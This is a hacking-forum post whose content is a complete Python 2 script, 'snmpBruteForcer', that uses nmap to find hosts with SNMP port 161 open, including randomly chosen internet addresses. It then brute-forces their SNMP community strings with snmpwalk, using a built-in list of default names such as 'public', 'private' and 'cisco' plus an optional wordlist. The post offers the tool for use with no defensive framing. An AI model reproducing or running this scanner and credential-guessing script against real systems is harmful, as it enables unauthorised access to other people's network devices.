Jump to content
Gonzalez

SNMP Bruteforce

By Gonzalez, in Programe hacking

Recommended Posts

Gonzalez Newbie

Gonzalez

Posted
Posted 
#!usr/bin/python 
#Uses nmap to check if snmp port is open then uses snmpwalk to try and bruteforce 
#the community name. 

#Required: nmap and snmpwalk  

#Changelog: added iprange, single scans and threading for random scans 
#Changelog: added the ability to add your own wordlist, it will add to  
#the ones given and erase the duplicates 

#[url]http://darkcode.ath.cx[/url] 
#d3hydr8[at]gmail[dot]com 

import time, StringIO, commands, sys, re, threading, sets 

def timer(): 
   now = time.localtime(time.time()) 
   return time.asctime(now) 

def title(): 
   print "\n\t   d3hydr8[at]gmail[dot]com snmpBruteForcer v1.2" 
   print "\t--------------------------------------------------\n" 

def scan(option): 

   nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+option+' -p 161 | grep open -B 3')[1]).read() 
   if re.search("command not found",nmap.lower()): 
      print "\n[-] nmap not installed!!!\n" 
      sys.exit(1) 
   else: 
      ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap) 
      if ipaddr:           
         return ipaddr 

def brute(ip): 
   print "\n[+] Attempting BruteForce:",ip 
   try: 
      for n in names: 
         response = StringIO.StringIO(commands.getstatusoutput('snmpwalk '+ip+" "+n)[1]).readlines() 
         if re.search("command not found",response[0].lower()): 
            print "\n[-] snmpwalk not installed!!!\n" 
            sys.exit(1) 
         else: 
            if verbose ==1: 
               print "\t{- Trying:",n 
            if len(response) > 1: 
               print "\n\tSuccess:",ip,"Community Name:",n 
               print "\n\tTry: snmpwalk",ip,n,"\n" 
   except(), msg: 
      #print "Error:",msg 
      pass 

class Worker(threading.Thread): 
   def run(self): 
      ipaddr = scan("-iR 1") 
      if ipaddr != None: 
         for ip in ipaddr: 
            brute(ip) 

if len(sys.argv) <= 2: 
   title() 
   print "Usage: ./snmp_random.py <option> \n" 
   print "Example: ./snmpbrute.py -iprange 192.168.1-100.1-255 -verbose\n" 
   print "[options]" 
   print "   -s/single <ip>: Bruteforce single ip" 
   print "   -i/-iprange <ip_range>: Scans ip range for snmp to brute force" 
   print "   -r/-random <how many to scan>: Will scan random ip's for snmp to brute force" 
   print "   -l/-list <wordlist file>: Add your own wordlist" 
   print "   -v/-verbose : Verbose Mode\n" 
   sys.exit(1) 

#Add more community names here. 
names = ["1234","2read","4changes","CISCO","IBM","OrigEquipMfr","SNMP","SUN","access","admin","agent","all","cisco" 
      ,"community","default","enable","field","guest","hello","ibm","manager","mngt","monitor","netman","network" 
      ,"none","openview","pass","password","passwd","private","proxy","public","read","read-only","read-write" 
      ,"root","router","secret","security","snmp","snmpd","solaris","sun","switch","system","tech","test" 
      ,"world","write"] 

for arg in sys.argv[1:]: 
   if arg.lower() == "-s" or arg.lower() == "-single": 
      ipaddr = sys.argv[int(sys.argv[1:].index(arg))+2] 
      mode = "Single IP" 
   if arg.lower() == "-i" or arg.lower() == "-iprange": 
      iprange = sys.argv[int(sys.argv[1:].index(arg))+2] 
      mode = "Ip-Range" 
   if arg.lower() == "-r" or arg.lower() == "-random": 
      total = sys.argv[int(sys.argv[1:].index(arg))+2] 
      mode = "Random" 
   if arg.lower() == "-l" or arg.lower() == "-list": 
      wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] 
   if arg.lower() == "-v" or arg.lower() == "-verbose": 
      verbose = 1 
title()    
try: 
   print "[+] Wordlist:",wordlist,"loading" 
     words = open(wordlist, "r").readlines() 
   print "[+] Loaded:",len(words),"names" 
   names = list(sets.Set(words+names)) 
except(IOError):  
     print "Error: Check your wordlist path\n" 
     sys.exit(1) 
except(NameError): 
   pass 

print "[+] Mode:",mode 
if mode == "Random": 
   if total.isdigit() == False: 
      print "\n[!] How many ips to scan: must be a number\n" 
      sys.exit(1) 
   else: 
      print "[+] Total:",total 
if mode == "Ip-Range": 
   print "[+] Range:",iprange 
try: 
   if verbose ==1: 
      print "[+] Verbose Mode On" 
except(NameError): 
   verbose = 0 
   print "[-] Verbose Mode Off" 
print "[+] Names Loaded:",len(names) 
print "[+] Started:",timer(),"\n" 

if mode == "Random": 
   for i in range(int(total)): 
      print "[+] Scanning:",i+1,"of",total 
      work = Worker() 
      work.start() 
      time.sleep(1) 
if mode == "Single IP": 
   brute(ipaddr) 
if mode == "Ip-Range": 
   print "[+] Scanning:",iprange 
   ips = scan(iprange) 
   if ips != None: 
      print "[+] Found:",len(ips) 
      for ip in ips: 
         brute(ip) 
   else: 
      print "\n[!] No SNMP Open" 

print "\n[-] Done -",timer(),"\n"

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...